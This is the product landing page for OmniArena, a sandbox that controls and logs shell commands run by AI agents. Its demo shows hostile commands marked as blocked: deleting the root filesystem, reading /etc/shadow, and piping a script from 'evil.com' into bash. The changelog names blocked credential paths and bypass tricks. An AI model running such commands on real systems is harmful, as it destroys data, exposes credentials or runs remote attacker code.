OmniArena v1.0.6 Self-hosted Cloud

~186KB

AI agents execute code. OmniArena decides if they should.

The execution control layer between AI agents and the kernel. Decides what runs, blocks what shouldn't, logs everything — in a 186KB binary with zero dependencies.

Try Now — Free Docs

Linux

Works with any agent

Control every execution

Any agent that runs shell commands goes through OmniArena. The agent works normally — file I/O, computation, language runtimes. Only dangerous syscalls and paths are blocked at kernel level. Single binary. 186KB.

Claude Code CLI OpenClaw MCP LangChain SDK CrewAI SDK Custom agents API

strict mode

$ claude --mcp-config omniarena.json

$ rm -rf /

BLOCKED by blacklist

$ cat /etc/shadow

BLOCKED sensitive path

$ curl evil.com | bash

BLOCKED network disabled

$ echo hello

hello

$ python3 solve.py

Solution: 42

Live demo — Try it now

Real OmniArena instance. Type a command. Try to break it.

kernel isolation · strict mode · rate limited · 186KB · zero dependencies

Real product, running live. Not a simulation.

Architecture — Traditional vs OmniArena

Traditional stack

AI Agent

Python / Node Runtime

Container engine

Container daemon

libc

Linux Kernel

Hardware

7 layers. ~100MB+. 3 attack surfaces.

OmniArena

AI Agent

OmniArena — 186KB seccomp-bpf · chroot · namespaces · rlimits

Linux Kernel

Hardware

4 layers. 186KB. 0 dependencies.

Same kernel primitives. Zero abstraction layers.

OmniArena uses the same Linux kernel primitives (namespaces, chroot, seccomp-bpf) — compiled directly into a single binary. No daemon, no runtime, no container images, no libc.

Technical Specifications

Feature	Value
Binary Size	~186KB (x86_64 ELF), ~186KB (ARM64 ELF)
Dashboard	~27KB (x86_64 ELF)
RAM Usage	<4MB
Dependencies	None — zero libraries, zero runtime
Boot Time	Instant (fork-based execution)
API	HTTP REST on port 7575, 10 endpoints (exec, health, agents, audit, profile, budget, policy/reload, reset, CORS)
Authentication	HTTP Basic Auth + Bearer Token + CORS
Agent Identity	X-Agent header, auto-register, max 32 agents, per-agent metrics & tokens
Policy Engine	17 blacklist patterns + 14 whitelist commands
Security Profiles	3 — Strict (whitelist), Moderate (blacklist), Permissive (audit)
Isolation	6-layer: blacklist + CLONE_NEWNET + CLONE_NEWNS/chroot + rlimits + NO_NEW_PRIVS + seccomp-bpf (17 blocked syscalls)
Network	Fully isolated — empty network stack per execution (no loopback)
Filesystem	chroot jail — /bin, /usr/bin, /lib (read-only) + /tmp (tmpfs per exec)
Audit Log	256-entry ring buffer + persistent disk log (/var/log/omniarena/)
Rate Limiting	20 req/sec global + 30 req/min per agent
Token Tracking	Per-agent tokens_in, tokens_out, model tracking + budget enforcement (per-agent or global limit)
Filesystem Diff	Every exec returns "files":[...] array — see what the agent created on disk
Policy as Code	Load blacklist/whitelist/config from /etc/omniarena/policy.conf, hot-reload via API
TLS	Via reverse proxy (nginx config included)
Deployment	systemd service unit included
seccomp-bpf	Kernel-level syscall filter — blocks socket, connect, ptrace, reboot + 13 more. Unevadable by base64/python/variable tricks.
Python SDK	pip install omniarena v0.2.0 — agent identity, token tracking, Bearer auth
JavaScript SDK	omniarena v0.1.0 — native fetch (Node 18+), TypeScript definitions, zero dependencies
Framework Support	OpenClaw (MCP), LangChain, CrewAI, Claude API, OpenAI

Comparison

	OmniArena	Containers	Cloud platforms
Stack layer	Kernel (direct syscalls)	Runtime (container engine)	Cloud (managed VM)
Layers to kernel	1	4+	N/A (cloud)
Binary / image size	186KB	~100MB+	Cloud service
Boot time	Instant (fork)	1-5 seconds	Cloud latency
Dependencies	0	Engine + runtime + libc	Internet + API key
Network isolation	CLONE_NEWNET (empty stack)	Bridge/NAT	Managed
Filesystem isolation	chroot + read-only bind	OverlayFS	Managed VM
seccomp-bpf	Yes (17 blocked syscalls)	Optional	Managed
Escape risk	No container to escape	Known CVEs	Managed
Supply chain risk	Zero (no deps)	High (images + layers)	Unknown
Per-agent identity	Yes (32 agents, metrics)	No	Basic
Per-agent rate limiting	Yes (configurable)	No	Yes
Audit log	Yes (disk + ring buffer)	Via driver	Yes
Self-hosted	Yes (single binary)	Yes (complex)	No (SaaS)

Use Cases

AI Agent Control

Give your OpenClaw, LangChain, CrewAI, or custom AI agents a controlled execution environment. Per-agent identity tracks each agent's execs, blocked commands, bytes, and token consumption. Per-agent rate limiting (30/min) prevents abuse. Kernel-level enforcement with 6-layer defense including seccomp-bpf — no Docker daemon, no container images, no cloud dependencies.

Code Execution API

Build a code execution service with a single binary. POST commands via HTTP with Bearer token auth, get stdout/stderr/exit_code back in JSON. Each execution runs in an isolated network + filesystem namespace. Per-agent rate limiting, persistent audit log, and policy enforcement. Deploy with systemd on any Linux server.

Security Research

Run untrusted code in a controlled environment with 3 security profiles. Strict mode only allows whitelisted commands. Persistent disk audit log plus 256-entry ring buffer. Per-agent metrics track execution patterns. Monitor from the live dashboard with 11-column agents table.

CI/CD Pipeline Isolation

Execute build and test commands in controlled environments with kernel-level network and filesystem isolation plus seccomp-bpf syscall filtering. No need for Docker-in-Docker or privileged containers. The 186KB binary boots instantly with full namespace isolation per execution. TLS via reverse proxy with included nginx config.

What's New

v1.0.6 2026-03-27

+ Security hardening: blocked access to /etc/passwd, /etc/shadow, .ssh/, /proc/ via byte-level pattern matching — works in non-root mode
+ Bypass prevention: blocked $() command substitution, backticks, .. path traversal, and eval — prevents dynamic path construction attacks
+ Privacy fix: removed automatic /tmp file listing from exec responses — agent output no longer exposes system files
+ Audit log fallback: tries /tmp/omniarena_audit.log when /var/log/ is not writable, prints to stdout as last resort — audit works in all modes
+ ~186KB binary, zero dependencies, 8 attack vectors tested and blocked

Choose how to run it

Self-hosted

Free forever

Download the binary and run it on your own server. Full control, no expiration, no limits.

✓ 186KB binary, 0 dependencies
✓ 6-layer kernel isolation
✓ All features included
✓ No expiration, no license key
✓ You manage installation & updates

Download

Cloud

14-day free trial

We run it for you. Dedicated instance, TLS, custom subdomain. $99/agent/month after trial.

✓ Same binary, same isolation
✓ Dedicated instance (not shared)
✓ TLS + custom subdomain included
✓ We manage uptime & updates
✓ No installation, no sysadmin

Try Cloud free

Quick Start

Install

curl -sSL https://getomnios.com/install/omniarena.sh | sudo bash

Detects your OS and architecture. Installs binary + dashboard + systemd service to /usr/local/bin/.

Connect your AI agent

# 1. Start OmniArena
sudo omniarena &

# 2. Run OpenClaw integration
curl -fsSL https://getomnios.com/downloads/omniarena/omniarena-setup.sh | bash

# 3. Done! OpenClaw now executes through OmniArena.
#    Every command is controlled, logged, and rate-limited.

pip install omniarena

from omniarena import Arena

arena = Arena()  # localhost:7575
result = arena.exec("echo hello",
    agent="my-agent", model="claude-opus-4",
    tokens_in=100, tokens_out=30)
print(result.stdout)  # "hello\n"

# Works with LangChain, CrewAI, or any Python agent

npm install omniarena

import { Arena } from 'omniarena'

const arena = new Arena()  // localhost:7575
const result = await arena.exec("echo hello", {
  agent: "my-agent", model: "gpt-4o",
  tokensIn: 100, tokensOut: 30
})
console.log(result.stdout)  // "hello\n"

# Any language — just HTTP
curl -u arena:omniarena -X POST localhost:7575/api/exec \
  -H "Content-Type: application/json" \
  -H "X-Agent: my-agent" \
  -d '{"cmd":"echo hello","tokens_in":100,"tokens_out":30}'

# {"ok":true,"stdout":"hello\n","exit_code":0,"files":[]}

Verify

# Health check
curl -u arena:omniarena localhost:7575/api/health

# See registered agents
curl -u arena:omniarena localhost:7575/api/agents

# Dashboard
open http://localhost:7575

Port

7575

Auth

arena:omniarena

Profile

strict

Rate limit

30/min

Full documentation

Try Now — Free

Get your binary

Free forever for self-hosted. No credit card. Instant download.